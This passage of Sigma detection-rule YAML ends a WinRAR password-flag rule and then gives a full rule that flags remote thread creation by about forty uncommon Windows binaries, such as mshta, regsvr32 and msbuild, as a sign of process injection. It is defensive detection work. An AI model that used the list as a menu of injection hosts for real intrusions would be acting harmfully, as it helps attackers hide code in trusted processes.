    condition: selection_password and selection_other
falsepositives:
    - Legitimate use of Winrar command line version
    - Other command line tools, that use these flags
level: high

title: Rare Remote Thread Creation By Uncommon Source Image
id: 02d1d718-dd13-41af-989d-ea85c7fab93f
related:
    - id: 66d31e5f-52d6-40a4-9615-002d3789a119
      type: derived
status: test
description: Detects uncommon processes creating remote threads.
references:
    - Personal research, statistical analysis
    - https://lolbas-project.github.io
author: Perez Diego (@darkquassar), oscd.community
date: 2019-10-27
modified: 2025-12-08
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
logsource:
    product: windows
    category: create_remote_thread
detection:
    selection:
        SourceImage|endswith:
            - '\bash.exe'
            - '\cscript.exe'
            - '\cvtres.exe'
            - '\defrag.exe'
            - '\dialer.exe'
            - '\dnx.exe'
            - '\esentutl.exe'
            - '\excel.exe'
            - '\expand.exe'
            - '\find.exe'
            - '\findstr.exe'
            - '\forfiles.exe'
            - '\gpupdate.exe'
            - '\hh.exe'
            - '\installutil.exe'
            - '\lync.exe'
            - '\makecab.exe'
            - '\mDNSResponder.exe'
            - '\monitoringhost.exe' # Loads .NET CLR by default and thus a favorite for process injection for .NET in-memory offensive tools.
            - '\msbuild.exe'
            - '\mshta.exe'
            - '\mspaint.exe'
            - '\outlook.exe'
            - '\ping.exe'
            - '\provtool.exe'
            - '\python.exe'
            - '\regsvr32.exe'
            - '\robocopy.exe'
            - '\runonce.exe'
            - '\sapcimc.exe'
            - '\smartscreen.exe'
            - '\spoolsv.exe'
            - '\tstheme.exe'
            - '\userinit.exe'
            - '\vssadmin.exe'
            - '\vssvc.exe'
            - '\w3wp.exe'
            - '\winscp.exe'
            - '\winword.exe'
            - '\wmic.exe'
            - '\wscript.exe'
    filter_main_conhost:
        SourceImage:
            - 'C:\Windows\System32\Defrag.exe'
            - 'C:\Windows\System32\makecab.exe'
        TargetImage: 'C:\Windows\System32\conhost.exe'
    filter_main_provtol_svchost:
        SourceImage: 'C:\Windows\System32\provtool.exe'
        TargetImage: 'C:\Windows\System32\svchost.exe'
    filter_main_provtool_system:
        SourceImage: 'C:\Windows\System32\provtool.exe'
        TargetImage: 'System'
    filter_main_userinit:
        SourceImage: 'C:\Windows\System32\userinit.exe'
        TargetImage: 'C:\Windows\explorer.exe'
    filter_main_winword:
        SourceImage|endswith: '\WINWORD.EXE'
        TargetImage|startswith:
            - 'C:\Program Files (x86)\' # C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            - 'C:\Program Files\' # C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\AI\ai.exe
    filter_main_ms_office:
        # Raised by following issue: https://github.com/SigmaHQ/sigma/issues/5529
        SourceImage|startswith:
            - 'C:\Program Files\Microsoft Office\'
            - 'C:\Program Files (x86)\Microsoft Office\'
        TargetImage: 'System'
    filter_optional_explorer_vmtools:
        SourceImage|endswith: '\SysWOW64\explorer.exe'
        TargetImage:
            - 'C:\Program Files (x86)\VMware\VMware Tools\vmtoolsd.exe'
            - 'C:\Program Files\VMware\VMware Tools\vmtoolsd.exe'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - This rule is best put in testing first in order to create a baseline that reflects the data in your environment.
level: high